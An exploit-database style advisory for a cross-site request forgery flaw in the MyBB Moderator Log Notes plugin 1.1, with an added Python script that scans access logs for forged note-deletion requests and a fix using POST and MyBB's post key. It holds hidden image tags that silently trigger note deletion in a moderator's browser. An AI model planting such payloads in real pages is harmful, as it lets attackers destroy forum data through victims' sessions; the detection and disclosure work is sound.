Exploits / Vulnerability Discovered: 2018-08-20
Type: webapps
Platform: php
This exploit / vulnerability, MyBB Moderator Log Notes plugin 1.1 cross-site request forgery, is for educational purposes only; if you use it, you do so at your own risk!
# 1. Description:
# The plugin allows moderators to save notes and display them in a list in the modCP.
# The CSRF allows an attacker to remotely delete all mod notes and mod note logs
# in the modCP & ACP.
<!-- You can also delete notes individually by the nid (note ID)
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=3" alt="">
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=2" alt="">
<img style="display:none" src="http://localhost/mybb15/modcp.php?action=deletenote&nid=1" alt="">
-->
</body>
</html>
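
A log check for the requests described above, added here as an example and not part of the original advisory: it scans combined-format access logs for GET requests to `modcp.php?action=deletenote` whose Referer is missing or is not the forum itself. The hostname `forum.example`, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

FORUM_HOST = "forum.example"  # assumption: the board's own hostname

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Aug/2018:10:00:01 +0000] "GET /mybb15/modcp.php?action=deletenote&nid=3 HTTP/1.1" 200 512 "http://other.example/page.html" "Mozilla/5.0"
203.0.113.7 - - [20/Aug/2018:10:00:01 +0000] "GET /mybb15/modcp.php?action=deletenote&nid=2 HTTP/1.1" 200 512 "http://other.example/page.html" "Mozilla/5.0"
198.51.100.4 - - [20/Aug/2018:10:05:00 +0000] "GET /mybb15/modcp.php?action=deletenote&nid=1 HTTP/1.1" 200 512 "http://forum.example/mybb15/modcp.php" "Mozilla/5.0"
198.51.100.4 - - [20/Aug/2018:10:06:00 +0000] "GET /mybb15/modcp.php?action=modlogs HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

def suspicious_deletes(log_text, forum_host=FORUM_HOST):
    """Return (ip, nid, referer_host) for deletenote GETs not referred by the forum itself."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        url = urlsplit(m["target"])
        query = parse_qs(url.query)
        if not url.path.endswith("/modcp.php") or query.get("action") != ["deletenote"]:
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or an empty Referer
        if ref_host != forum_host:
            hits.append((m["ip"], query.get("nid", [""])[0], ref_host))
    return hits

if __name__ == "__main__":
    for hit in suspicious_deletes(SAMPLE_LOG):
        print(hit)
```

A missing Referer is flagged too, so expect some false positives from clients that strip it. The durable fix is on the plugin side: make the delete action a POST that carries and verifies MyBB's `my_post_key` token.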